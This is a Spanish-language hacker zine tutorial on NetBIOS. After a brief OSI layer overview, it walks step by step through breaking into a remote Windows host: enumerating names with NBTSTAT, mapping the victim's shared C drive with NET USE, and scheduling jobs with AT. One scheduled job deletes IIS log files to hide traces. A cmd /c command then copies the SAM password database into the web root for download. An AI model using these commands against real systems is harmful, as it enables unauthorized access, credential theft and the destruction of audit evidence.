SWP 1.2: Netbios
--=[ xyz4a3 ]=--
Lo mas dificil siempre es dar el Primer paso para empezar algo, pasado esto ya estanos al otro lado, es asi como empezamos este texto, dificil de empezar, pero vamos a ver como seguimos adelante.
Cada uno Navega tranquilamente con su Pc por Internet, Que hay detras ????
1) Niveles OSI
- a. Aplicacion
- b. Presentacion
- c. Sesion
- d. Transporte
- e. Red
- f. Enlace
- g. Fisica
Fisica
Es el Medio Fisico ( Tarjeta Red,Cable,Hub etc ), el cual se encargara de verificar si esta Activo o no un medio Fisico, algo mas electrico.
Enlace
Se Encargara de Transmitir tramas de Informacion para asegurar que la comunicacion entre los medios fisicos exista, Estara prendido su Server??
> Ping xx.xx.xx.xx xD, Para esos que les gusta el Ping de la Muerte.
Red
Es el que se va a encargar de "Encaminar" el Paquete de Datos entre los nodos sin importarle el contenido.
Transporte
Es la que se encarga de recepcionar los Datos de la Capa Sesion, pasarlos por la red y asegurar que lleguen OK, Ya escucharon del NetCat????
sesión
Se encargara de Administrar el Dialogo entre los 2 nodos, es decir el Inicio y Fin de la comunicacion.
Presentación
Como no somos marcianos para entender lo que llega por la Red (Aunque conozco algunos ), este nivel se encarga de presentarnos los datos entendible en los formatos que Utilize (ASCII,EBCDIC Etc ).
Aplicación
Este nivel es el mas cristiano, donde nos entendemos con el equipo (ftp,http,etc), y todos utilizamos.
La Curiosidad nos lleva a Aplicar estos Conceptos, vamos poco a poco conociendolos:
Ahora Veremos un POCO de NETBIOS, PAra Luego Pasar a los Servicios y de ahi hacia adelante.
NETBIOS
Ahora que entendemos un poco estos niveles, vamos como los aplicariamos, como dije, Su Server estara prendido??
> ping -a www.miserverfavorito.com.pe // -a para resolver la direccion
Disparando contra miserverfavorito.com.pe [200.xx.xxx.xx] com 32 bytes de dados:
Resposta de 200.xx.xxx.xx:bytes=32 tempo=738ms Tempo de vida=49
Resposta de 200.xx.xxx.xx:bytes=32 tempo=705ms Tempo de vida=49
Resposta de 200.xx.xxx.xx:bytes=32 tempo=714ms Tempo de vida=49
Resposta de 200.xx.xxx.xx:bytes=32 tempo=710ms Tempo de vida=49
EstatÌsticas do Ping para 200.xx.xxx.xx:
Pacotes: Enviados = 4, Recebidos = 4, Perdidos = 0 (0% de perda),
Tempos aproximados de ida e volta em milissegundos:
MÌnimo = 705ms, M·ximo = 738ms, MÈdia = 716ms
Ahora ya sabemos quien es, Pero cual sera el nombre de su red???
> NBTSTAT -A 200.xx.xxx.xx
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
COMERCIAL1 <00> UNIQUE Registered
GRUPO01 <00> GROUP Registered
COMERCIAL1 <03> UNIQUE Registered
COMERCIAL1 <20> UNIQUE Registered
GRUPO01 <1E> GROUP Registered
GRUPO01 <1D> GROUP Registered
.._MSBROWSE__. <01> GROUP
MAC Address = 00-E0-53-54-00-00
Bueno eso no sirve casi de nada, Sabemos el Nombre del Server (<03>) y que existe el GRUPO01 de Trabajo, y es una red M$ (Como casi todas ) , Ahora como saben una Pc comun y Silvestre puede Compartir su HD,CD etc , Pero un Server es muy dificil que encuentren eso (Hay cada caso..), Ahora en Windoze NT existen muchos recursos compartidos que no necesariamente son Disco, Por ejemplo IPC$ y/o Printers etc. Como conectarse a ellos? en tu \WINDOW$\LMHOST adicionas:
<EDITAR> : 200.xx.xxx.xx PC01 #PRE #DOM:GRUPO01
Luego Ejecutas :
>NBTSTAT -R // Para referescar la Tabla
NetBIOS Names Resolution and Registration Statistics
----------------------------------------------------
Resolved By Broadcast = 3
Resolved By Name Server = 0
Registered By Broadcast = 28
Registered By Name Server = 0
NetBIOS Names Resolved By Broadcast
---------------------------------------------
COMERCIAL1
COMERCIAL1 <00>
COMERCIAL1
mmmm, Que estara compartido????
>NET VIEW \\COMERCIAL1
Recursos compartilhados em \\COMERCIAL1
Nome comp. Tipo Comentario
----------------------------------------
C-DRIVE Disco
EPSONLQ800 Impress„o
O comando foi concluÌdo com Íxito.
Ahora ya sabes los recursos que comparte, bueno, si quieres trabajar tranquilo, asignale una Unidad
>NET USE x: \\COMERCIAL1\C-DRIVE
>NET USE
Status Nome local Nome remoto
----------------------------------------------------
OK X: \\COMERCIAL1\C-DRIVE
O comando foi concluÌdo com Íxito.
Todo Este NETBIOS , Sera desde tu Box Win9x , Pero en un NT le agregan unos Comandos mas, Como Dominio , Users Etc.
WIn9x WinNT
NET VIEW \\computador NET VIEW \\Computador /DOMAIN
NET USE [Unidad:] \\Computadora\folder NET USE [Unidad:] \\computador\folder
/USER:dominio\Username
Es bueno saber en un NT ciertos comandos, de los varios que tiene :
NET START [Servicio]
EVENTLOG
FTP SERVER
SCHEDULER // Importante para dejar una Tareita despues de las 00:00 horas
// En una ruta conocida por Uds. :)
AT // Para programar a que hora se ejecutara
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\computername] time [/INTERACTIVE]
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
Ejemplo:
> AT 00:15 C:\InetPub\WWWRoot\bachero.bat // ó
> AT 00:15 del C:\Winnt\System32\LogFiles\w3svc1\*.log
Como sabemos el Win9x tiene su COMMAND.COM y el NT tiene su CMD.EXE, estos nos permitiran el Shell en dichos sistemas Operativos, asi en el NT tenemos:
CMD [/X | /Y] [/A | /U] [/Q] [[/C | /K] string]
El mas Usado en los Exploits para dar Shell, es el CMD /C , El Cual ejecutara el Comando dado en [String] y Terminara. Ejemplo :
>cmd /c rdisk /S-
>cmd /c copy c:\winnt\repair\sam._ c:\inetput\wwwroot // Download ??? :)
Bueno senores, Es una pequena vista del NetBios.....Ahi nos vemos ...